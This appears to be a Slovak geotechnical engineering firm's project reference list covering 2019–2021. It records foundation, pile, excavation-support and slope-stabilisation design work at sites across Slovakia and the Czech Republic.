Popis práce: 2231: KE, Rekonštrukcia a modernizácia cesty II/552 – Slanecká cesta, Prekládka 2×110 kV vedenia V6831/6832 v úseku p.b.č.7 – p.b.č.9a

Miesto práce: Košice

Popis stavby: Priemyselný park Nitra – sever

Popis práce: Základové konštrukcie, realizačná dokumentácia

Miesto práce: Nitra

Popis stavby: Mobilný dom – Nižný Klátov

Popis práce: Základové konštrukcie, pomocou mikropilót

Miesto práce:Nižný Klátov

Popis stavby: LOGISTICKO-PRIEMYSELNÝ PARK Nová Polhora

Popis práce: SO 1.07 – CS PRÍTOK, realizačná dokumentácia zabezpečenia stavebnej jamy

Miesto práce: Nová Polhora

Popis stavby:vOIešná – Hrubý Buk – Rekonštrukcia NN siete

Popis práce: Zabezpečenie svahu pri stĺpe č.3 na akcii 14892 – OIešná – Hrubý Buk – Rekonštrukcia NN siete

Miesto práce: Olešná

Popis stavby: Považská Bystrica – DVA DUBY – I. etapa

Popis práce: Dokumentácia špeciálneho zakladania v stupni: Stabilitný výpočet

Miesto práce: Považská Bystrica

Popis stavby: Odstránenie havarijného stavu cesty III/3244

Popis práce: Dokumentácia pre realizáciu stavby

Miesto práce: Rudňany-Poráč

Popis stavby: SO120.2.T – Technicko-prevádzkový objekt (TPO)

Popis práce: Tendrová dokumentácia

Miesto práce: Rusovce

2021

Popis stavby: Terasová bytová výstavba – Košice – Baránok – II.etapa

Popis práce: Projektová dokumentácia kotvenia oporných múrov objektov SO 201.22, SO 201.12, SO 201.11, SO 201.21,

                           Kontrola návrhu oporných múrov, vzhľadom na zmenu kotevného systému

Miesto práce: Košice

Popis stavby: Terasová bytová výstavba – Košice – Baránok – II.etapa

Popis práce: Projektová dokumentácia kotvenia oporných múrov objektov SO 201.22, SO 201.12, SO 201.11, SO 201.21,

Stupeň dokumentácie: Dokumentácia pre územné rozhodnutie

Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí
Objekt:  Spodná stavba
– Zabezpečenie stavebnej jamy, špeciálne zakladanie
– Hlbinné základy

Miesto práce: Košice

Popis stavby: Mostný objekt s evidenčným číslom MO 2240-007 na ceste III/2240 v km 5,910 – 5,916 sa nachádza v k.ú. Zázrivá a premosťuje potok Zázrivka v km 16,58. Voľná šírka na moste je 5,75 m a šírka medzi obrubníkmi je 5,0 m.

Popis práce: Inžinierske stavby

Stupeň dokumentácie: DSPRS

Objekt: SO 02 Úprava cesty III/2240

Miesto práce: Zázrivá

Popis stavby: Rekonštrukcia oporného múru

Popis práce: Geotechnika

Stupeň dokumentácie: DSP / DRS

Miesto práce: Turie

Popis stavby: Sanácia zosuvu telesa cesty

Popis práce: Geotechnika / inžinierské stavby

Stupeň dokumentácie: DSPRS

Objekt: SO 01 – OPORNÝ MÚR, SO 02 – CESTA

Miesto práce: Leštiny

Popis stavby: ELTEK s.r.o. – II. etapa

Popis práce: Špeciálne zakladanie

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Objekt: Hala

Miesto práce: Liptovský Hrádok

Popis práce: Navýšenie a spevnenie hrádze

Stupeň dokumentácie: Projekt pre stavebné povolenie

Miesto práce: Hencovce

Popis stavby: Modernizácia závodu UBM Agro Slovakia VKZ, Výrobňa kŕmnych zmesí- prestavba a prístavba, SO05 VÝROBŇA KŔMNYCH ZMESÍ, Pilótové zakladanie

Popis práce: Špeciálne zakladanie

Stupeň dokumentácie: Realizačná dokumentácia

Objekt: SO 05 VÝROBŇA KŔMNYCH ZMESÍ HLBINNÉ ZÁKLADY

Miesto práce: Čaňa

Popis stavby: Žilina – Rezidencia „Kolečko“

Stupeň dokumentácie: VTD

Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí

Objekt: SO 01, SO01.1, SO01.3, SO01.4

Miesto práce: Žilina

Popis stavby: Hĺbkové zakladanie – realizačný projekt

Popis práce: Špeciálne zakladanie

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Objekt: Hala

Miesto práce: Sabinov

Popis stavby: Polyfunkčný súbor Popradská

Popis práce: Posúdenie novostavby

Stupeň dokumentácie: DSP

Objekt: SO105/ blok C

Miesto práce: Košice

Popis práce: Špeciálne zakladanie

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Objekt: Skladová hala

Miesto práce: Senec

Popis práce: Špeciálne zakladanie

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Objekt: Skladová hala – zakladanie

Miesto práce: Prešov

Popis práce: Špecifické zakladanie

Stupeň dokumentácie: RPD

Miesto práce: Drietoma

Popis stavby: Zabezpečenie stavebnej jamy

Popis práce: Geotechnika

Miesto práce: Bratislava

Popis práce: Špeciálne zakladanie – geotechnika

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Dokumentácia stavebných objektov

Objekt: Pilótová stena

Miesto práce: Košice

Popis práce: Špecifické zakladanie

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Dokumentácia stavebných objektov

Objekt: SO 01 – Prístavba haly – I. etapa

SO 02 – Prístavba haly – II. etapa

Miesto práce: Veľké Turovce

Popis stavby: Novostavba – bytový dom v Žiline

Popis práce:  Špeciálne zakladanie

Stupeň dokumentácie: Dokumentácia pre stavebné povolenie

Časť projektovej dokumentácie: Dokumentácia stavebných objektov

Miesto práce: Žilina

2020

Popis stavby: Klingerka II
Popis práce: DOKUMENTÁCIA K ÚZEMNÉMU ROZHODNUTIU  OBJEKT KLINGERKA II – stupeň DUR

Miesto práce: Bratislava

Popis stavby: Bytový dům RODBO s doplňkovými administrativními a obchodními jednotkami

Popis práce: Dokumentácia realizácie stavby, Konštrukčná podzemná tesniaca a pažiaca stena, SO.02 Hlavní budova, Špeciálne zakladanie a geotechnika
Miesto práce: Praha

Popis stavby:  SO 01 – Skladovacia hala, pilotové založenie stavby,

Popis práce: Dokumentácia realizácie stavby, Špeciálne zakladanie a geotechnika
Miesto práce: Baldovce

Popis stavby: SO 01 – Polyfunkčná budova „NOVA“

Popis práce: Dokumentácia realizácie stavby, Špeciálne zakladanie a geotechnika
Miesto práce: Bánovce nad Bebravou

Popis stavby: ČSPH Banská Bystrica – stavebné úpravy a udržiavacie práce

Popis práce: Zabezpečenie stavebnej jamy, realizačná dokumentácia

Miesto práce: Banská Bystrica

Popis stavby: SO 2P.22 Stavebná jama pre zátvorný objekt a čerpaciu stanicu

Popis práce: Zabezpečenie stavebnej jamy, realizačná dokumentácia

Miesto práce: Banská Bystrica

Popis stavby: POLYFUNKČNÝ DOM, ul. BAZOVÁ,

Popis práce: SO 01 POLYFUNKČNÝ DOM – SEKCIA A

Časť projektovej dokumentácie: Dokumentácia stavebných objektov
Obchodný súbor: Zabezpečenie stavebnej jamy
Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: DEUTSCHE SCHULE BRATISLAVA, návrh zabezpečenia svahu pre plánovanú výstavbu.

Stupeň dokumentácie:   Dokumentácia realizácie stavby

Časť projektovej dokumentácie: Zabezpečenie svahu

Stavba:  Zabezpečenie svahu

Stavebný objekt: SO 03

Profesný diel:  Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: Zabezpečenie svahov cesty, klincovaný svah, BRATISLAVA, Jeseniova ulica

Stupeň dokumentácie:  Dokumentácia pre stavebné povolenie
Časť projektovej dokumentácie:  Zabezpečenie svahov pri RD
Stavba:  Spevnenie svahov pri RD – Jeséniova
Objekt: Klincovaný svah
Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: KLINGERKA II – ČASŤ A,  BRATISLAVA, spôsob otvorenia stavebnej jamy pomocou podzemnej, konštrukčnej, železobetónovej, tesniacej a pažiacej steny (PKTS).

Stupeň dokumentácie: Dokumentácia pre územní rozhodnutie
Časť projektovej dokumentácie: Klincovaný  svah, PKTS, pilótové zakladanie
Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: NOVÁ CVERNOVKA,  BRATISLAVA, Projekt pilótového zakladania – pilótový plán B

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie: Dokumentácia stavebných objektov
Obchodný súbor: Pilótové zakladanie
Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: PANORAMA BUSINESS IV, BRATISLAVA , návrh zabezpečenia výkopov, stavebnej jamy, hlbinného založenia, čerpania vody a sanácia prípadnej environmentálnej záťaže

Stupeň dokumentácie: Dokumentácia pre územné rozhodnutie
Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí
Obchodný súbor: Zabezpečenie stavebnej jamy, špeciálne zakladanie
Objekt:
Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: Verejný skladový objekt SELFSTORAGE Turbínová ul., , BRATISLAVA , návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie: Dokumentácia stavebných objektov
Obchodný súbor: Zabezpečenie stavebnej jamy, špeciálne zakladanie
Obchodný súbor: Pilótové zakladanie
Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: Zabezpečenie stavebnej jamy Geodoska , BRATISLAVA , dokumentácia rieši zabezpečenie stavebnej jamy a Geodosky.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí
Objekt: Paženie stavebnej jamy, Geodoska
Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: Zabezpečenie svahu na stavbe „Bratislavské podhradie – Vydrica“ audit, BRATISLAVA , vypracovanie nezávislého stabilitného výpočtu a preukázania vhodnosti daného riešenia

Stupeň dokumentácie: audit
Objekt: SO-SS3.1 Odstránenie časti skalného masívu, Klincovaný torkrét
Profesia: geotechnika – Spevnenie svahu

Miesto práce: Bratislava

Popis stavby: Zlaté schody, BRATISLAVA ,

Stupeň dokumentácie:  Dokumentácia pre stavebné povolenie
Časť projektovej dokumentácie:  Zabezpečenie svahov pri RD
Stavba:  Spevnenie svahov pri RD – Zlaté schody
Objekt: klincovaný svah
Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: Bziny, Mokraďská cesta III/2250 v km 1,45 – 1,52
Sanácia nebezpečného brala ohrozujúceho cestnú premávku na komunikácii III/2250 dlhoročným zvetrávaním hornín, uvoľňovaním skalných blokov, bujnením zelene a drevín vychádza z rizika, ktoré hrozí pri páde týchto skalných blokov, hornín a drevín na vozovku.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie:  Zabezpečenie svahov pri RD
Profesný diel: geotechnika

Miesto práce: Bziny

Popis stavby: SANÁCIA TELESA CESTY II/584 V CKM 59,138 – 59,213 V INTRAVILÁNE OBCE DEMÄNOVSKÁ DOLINA

Sanácia telesa cesty vykonaná z dôvodu jej súčasného veľmi zlého stavebnotechnického stavu, výmenou narušeného bezpečnostného zariadenia, vrátane odvodnenia cestného telesa.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie:  Zabezpečenie svahov pri RD
Profesný diel: geotechnika

Miesto práce: Demänovská Dolina

Popis stavby: NCDP – Nové centrum Devína – potraviny.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: dokumentácia stavebných objektov a inžinierskych sietí

Obchodný súbor: Zabezpečenie stavebnej jamy

Objekt:  Zabezpečenie stavebnej jamy

Profesný diel:  Špeciálne zakladanie a geotechnika

Miesto práce: Devín

Popis stavby: Predmetom technickej správy je opis technického riešenia spevnenia svahu pri výstavbe rodinných domov v Divine.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Profesný diel: Geotechnika, spevnenie svahu

Miesto práce: Divina

Popis stavby: Sanácia zosuvu svahu na križovatke Hlohovec – vetva Trakovice na diaľnici D1

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Objekt: Oporný múr MGTM

Profesný diel: Geotechnika

Miesto práce: Hlohovec

Popis stavby: Prepojenie vodární Ružomberok

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí

Obchodný súbor: Špeciálne zakladanie a geotechnika

Objekt: SO 16.02 – čerpacia stanica kalu – zaistenie šachty

SO 16.02 – úpravňa vody – zaistenie šachty

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Ružomberok

Popis stavby:Projekt rieši hlbinné zakladanie halového objektu v Komárne na pilótach a základových hlaviciach v areáli spoločnosti Marina – alt s.r.o., Platanova alej 2435. Hornú stavbu tvorí železobetónový skelet, stĺpy sú monolitické na základových hlaviciach

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie:Dokumentácia stavebných objektov a inžinierskych sietí

Obchodný súbor:  Hlbinné základy

Objekt:  polyfunkčný objekt a parkovisko

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Komárno

Popis stavby: Výrobná hala Metal Forming Solution (MFS)

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Obchodný súbor: Špeciálne zakladanie a geotechnika

Objekt: SO 01 Výrobno – skladovacia hala

Profesný diel: špeciálne zakladanie

Miesto práce: Kechnec

Popis stavby: Projektová dokumentácia sa týka akcie „Ochrana cesty II/584 pred padajúcimi kameňmi v ckm 23,500 – 23,550 a vyčistenie zárubného múru v úseku Huty – Liptovské Matiašovce v ckm 23,500 – 23,550“. Na základe terénnej obhliadky stavby a geologického mapovania územia bola vypracovaná projektová dokumentácia, spočívajúc v návrhu a posúdení sanačných opatrenia pre predmetný úsek

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí

Profesný diel: Geotechnika a inžinierske stavby

Miesto práce: Liptovské Matiašovce – Huty

Popis stavby: Oporný múr brehu potoka Komjatná na ceste III/2256 v intraviláne obce Komjatná v staničení ckm 5,428 – 5,463 CDB

Stupeň dokumentácie: Dokumentácia je spracovaná pre stavebné povolenie v rozsahu realizačnej projektovej dokumentácie (DSPRS).

Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí

Profesný diel: Geotechnika a inžinierske stavby

Miesto práce: Komjatná

Popis stavby: Predmetom technickej správy je popísať spôsob zabezpečenia stavebnej jamy pomocou štetovníc.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Objekt: SO 03.1 Zátvorný objekt – stavebná jama

Profesný diel: Geotechnika

Miesto práce: Klátovské rameo

Popis stavby: Predmetom technickej správy je popísať zabezpečenie stavebnej jamy.

Stupeň dokumentácie: Realizačná dokumentácia

Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí

Objekt: Paženie stavebnej jamy

Profesný diel:  Geotechnika

Miesto práce: Košice

Popis stavby: Predmetom technickej správy je popísať zabezpečenie stavebnej jamy.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie:  Dokumentácia stavebných objektov

Obchodný súbor:  Pilótové zakladanie

Profesný diel:  Špeciálne zakladanie a geotechnika

Miesto práce: Košice

Popis stavby: Rekonštrukcia protilavínových zábran,

Svah č.1 (km2,739 – km2,707)

Svah č.2 (km2,690 – km2,663)

Svah č.3 (km2,621 – km2,610)

Svah č.4 (km2,580)

Svah č.5 (km2,569 – km2,450)

Miesto stavby:  TÚ 2611 ŽST Kraľovany – ŽST Trstená

DÚ 02 ŽST Kraľovany – ŽST Párnica

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Profesný diel:  geotechnika

Miesto práce:Kraľovany – Párnica

Popis stavby: Projektová dokumentácia sa týka akcie „Sanácia skalnej steny v km 3,15-3,75 Kraľovany – Párnica, inžinierskogeologické mapovanie, zameranie diskontinuít, fyzické zhodnotenie kondície skalnej steny, stabilitné posúdenie skalnej steny a vyznačenie rizikových zón v rámci projektu sanácie skalných stien. Na základe týchto poznatkov bola vypracovaná projektová dokumentácia DSPRS, spočívajúc v návrhu a posúdení sanačných opatrenia pre brala označených č.1 až č.4 (číslovanie brál podľa projektovej dokumentácie).

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Profesný diel:  geotechnika

Miesto práce: Kraľovany – Párnica

Popis stavby: Projekt rieši hlbinné zakladanie halového objektu v Krnově na pilótach a základových hlaviciach v areáli spoločnosti DMHERMES TRADE s.r.o. Krnov. Hornú stavbu tvorí železobetónový skelet, stĺpy sú votknuté do kalichových základových hlavíc.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí

Obchodný súbor: Hlbinné základy

Objekt: D1.2

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Krnov, Česká republika

Popis stavby: Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej
stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú
úroveň jednotlivých častí objektu a zároveň geologické pomery.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Dokumentácia stavebných objektov

Obchodný súbor: Hlbinné základy

Objekt:SO 1b ETAPA I.

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Lanškroun, Česká republika

Popis stavby: Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej
stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú
úroveň jednotlivých častí objektu a zároveň geologické pomery. 

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Dokumentácia stavebných objektov

Obchodný súbor: Pilótové základanie

Objekt: SO 001

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Levice

Popis stavby: Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Dokumentácia stavebných objektov

Obchodný súbor: Pilótové zakladanie

Objekt: SO-201-C1 – Bytový dom, SO-202-C2 – Bytový dom, SO-203-C3 – Bytový dom, SO-204-E – Bytový dom

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Nová Palúdzka- Liptovský Mikuláš

Popis stavby: Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Dokumentácia stavebných objektov

Obchodný súbor: Pilótové zakladanie

Objekt: SO 101 – Obchodné centrum OBI

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Michalovce

Popis stavby:Predmetná časť územia je skalného charakteru v súčasnosti po prebiehajúcich stavebných prácach s aktuálne voľne odkopanými skalnými stenami, ktoré je potrebné zabezpečiť proti vypadávaniu úlomkov počas prevádzky komplexu. Taktiež skalné svahy v dolnej časti pri chodníkoch je potrebné zabezpečiť obkladom z gabiónov, aby nedochádzalo k ich postupnej degradácii počas užívania komplexu.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie: Zabezpečenie svahov gabiónmi a sieťovaním

Objekt: Obkladové a gravitačné gabióny, sieťovanie skalného svahu

Profesný diel: geotechnika

Miesto práce: Nitra

Popis stavby: Rekonštrukcia cesty II/520 realizovaná v úseku staničenia km 18,625 až 20,094 (kilometrovníkové). Vozovka komunikácie je v súčasnej dobe poškodená pozdĺžnymi, priečnymi a sieťovými trhlinami, rozpadnutou vozovkou pri krajnici a prepadnutou vozovkou v mieste realizovania inžinierskych sietí (vzniknuté nekvalitnou realizáciou pri spätnej úprave výkopu)

Stupeň dokumentácie: Dokumentácia pre stavebné povolenie

Objekt:km 18,625 až 20,094 (kilometrovníkové)

Profesný diel: geotechnika

Miesto práce: Nová Bystrica

Popis stavby: Most s evidenčným číslom MO 2274-002 sa nachádza na ceste III/2274 vedúcej z Oravskej Jasenice
do Oravského Veselého a premosťuje Poperačský potok.

Stupeň dokumentácie: Dokumentácia pre stavebné povolenie a realizáciu stavby

Objekt: SO 01 Most MO 2274-002

Profesný diel: geotechnika

Miesto práce: Oravská Jasenica

Popis stavby: Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie: Dokumentácia stavebných objektov
Obchodný súbor: Pilótové zakladanie
Profesný diel: Špeciálne zakladanie a geotechnika

Objekt:SO 01 – VLASTNÝ OBJEKT

Miesto práce: Petrovany

Popis stavby:Navrhnutý je železobetónový stužujúci trám založený na mikropilótach v dĺžke 20,0m rekonštruovaného úseku. Rozmery navrhovaného trámu sú 1,20 x 1,20m a je založený na mikropilótach, ktoré budú navŕtané v rastri 0,8 x 0,8m. Projekt trámu nerieši osadenie bezpečnostného zariadenia a odvodnenia cesty.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Profesný diel: geotechnika

Objekt:cesta II/566

Miesto práce: Podhoroď-Ruský Hrabovec

Popis stavby: Predmetom technickej správy je riešenie založenia stavby pomocou mikropilót tak, aby bolo bezpečne prenesené zaťaženie  z objektu do podložia.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie:  Dokumentácia stavebných objektov

Obchodný súbor:  Pilótové zakladanie

Profesný diel:  Špeciálne zakladanie a geotechnika

Objekt: SO 106 KARPATSKÁ RESIDENCE

Miesto práce: Poprad

Popis stavby: sanácia prúdového zosuvu – Objekt SSÚD 5 Považská Bystrica

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Profesný diel:  geotechnika

Miesto práce: Objekt SSÚD 5 Považská Bystrica

Popis stavby: Predmetom technickej správy je riešenie zaistenia rampy EPERIE I pomocou mikropilót.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Obchodný súbor:  Pilótové zakladanie

Profesný diel:  Špeciálne zakladanie a geotechnika

Miesto práce: Prešov

Popis stavby: Projekt rieši hlbinné zakladanie halového objektu v Komárne na pilótach a základových hlaviciach v areáli spoločnosti Marina – alt s.r.o., Platanova alej 2435. Hornú stavbu tvorí železobetónový skelet, stĺpy sú monolitické na základových hlaviciach.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby

Časť projektovej dokumentácie:  Dokumentácia stavebných objektov a inžinierskych sietí

Obchodný súbor:  Hlbinné základy

Objekt:  polyfunkčný objekt a parkovisko

Profesný diel:  Špeciálne zakladanie a geotechnika

Miesto práce: Komárno

Popis stavby:Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie: Dokumentácia stavebných objektov
Obchodný súbor: Pilótové zakladanie
Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Trebišov

Popis stavby: pilótová stena spriahnutá žb. vencom stabilizovaná zemnými kotvami s pohľadovou žb. stienkou, odvodnenie zosuvného svahu štrkovými rebrami Dĺžka múru: 82,6m

Stupeň dokumentácie: Tendrová dokumentácia
Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí
Objekt: SO 01 Oporný múr s príslušenstvom a odvodnením svahu
Miesto práce: Turzovka

Popis stavby:Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie: Dokumentácia stavebných objektov
Obchodný súbor: Pilótové zakladanie
Profesný diel: Špeciálne zakladanie a geotechnika
Objekt: SO 01, SO 02 – Obchodné centrntrum HEXAGON
Miesto práce: Žarnovica

Popis stavby:Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery.

Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie: Dokumentácia stavebných objektov
Obchodný súbor: Pilótové zakladanie
Profesný diel: Špeciálne zakladanie a geotechnika
Miesto práce: Žilina

Popis stavby: Konštrukčné riešenie zabezpečenia stavebnej jamy a hlbinného zakladania. Pozemok priamo pod novostavbou je rovinatý avšak potom svah prudko klesá k severnému okraju parcely smerom k časti mesta – Frambor. Nachádzajú sa na ňom existujúce spevnené betónové plochy, trávnatý porast a náletové kroviny.

Stupeň dokumentácie: Dokumentácia pre stavebné povolenie (DSP)
Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí
Obchodný súbor: Zabezpečenie stavebnej jamy, špeciálne zakladanie
Objekt: SO00.1 – HTÚ a príprava územia
Profesný diel: geotechnika
Miesto práce: Žilina

Popis stavby: Úlohou projektu geotechnika je návrh zabezpečenia výkopov, stavebnej jamy a okolitých stavieb.

Stupeň dokumentácie: Dokumentácia pre stavebné povolenie
Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí
Obchodný súbor:  Zabezpečenie stavebnej jamy
Objekt:  SO 01, SO01.1, SO01.2, SO01.3, SO01.4 Zabezpečenie stavebnej jamy
Profesný diel: Špeciálne zakladanie a geotechnika
Miesto práce: Žilina

Popis stavby: Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia, za splnenia požadovaného sadania., na vytvorenej pilótovacej úrovni.
Stupeň dokumentácie: Dokumentácia pre stavebné povolenie
Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí
Obchodný súbor:Hlbinné základy
Objekt: SEKCIA J – BYTOVÝ DOM
Profesný diel:  Špeciálne zakladanie a geotechnika
Miesto práce: Žilina

Popis stavby: Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery.
Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí
Obchodný súbor: Hlbinné základy
Objekt: SO 01 Prístavba výrobno – skladových priestorov
Profesný diel:  Špeciálne zakladanie a geotechnika
Miesto práce: Zlaté Moravce

Popis stavby: Úlohou projektu geotechnika je návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery.
Stupeň dokumentácie: Dokumentácia pre realizáciu stavby
Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí
Obchodný súbor: Hlbinné základy
Objekt: SO 01 VÝROBNO-ADMIN. OBJEKT: ROZŠÍRENIA ADMIN. BUDOVY – JUŽNÉ KRÍDLO
Profesný diel:  Špeciálne zakladanie a geotechnika
Miesto práce: Zvolen

2019

Popis stavby: SO – 101, SO – 102, SO – 103,, SO – 104, SO – 105
Popis práce: Projekt hĺbkového zakladania, DSP
Miesto práce: Trnava

Popis stavby: paženie stavebnej jamy
Popis práce: Projekt zabezpečenia stabvebnej jemy
Miesto práce: Bratislava – Slávičie údolie

Popis stavby: Diaľnica D1 Hubová – Ivachnová SO 220
Popis práce: posúdenie únosnosti podložia pod podperné konštrukcie v úseku Most na vetve L- B1 križovatka Likavka v KM 0,477
Miesto práce:  Hubová – Ivachnová

Popis stavby: POLYFUNKČNÝ DOM – RUDLOVSKÝ POTOK
Popis práce: Pilótové zakladanie
Miesto práce:  Banská Bystrica

Popis stavby: Dokumentácia špeciálneho zakladania v stupni: Realizačný projekt
Popis práce:  Hĺbkové zakladanie časť A
Hĺbkové zakladanie časť B

Miesto práce: Žilina

Popis stavby: Bytový dom F , G, H
Popis práce: Bytový dom F, G, H s polyfunkčným parterom – projekt pilótového zakladania
Miesto práce:  Liptovský Mikuláš, k.ú. Demänová

Popis stavby: BROSE – ADMINISTRATÍVNA A VÝROBNÁ HALA – FÁZA III.
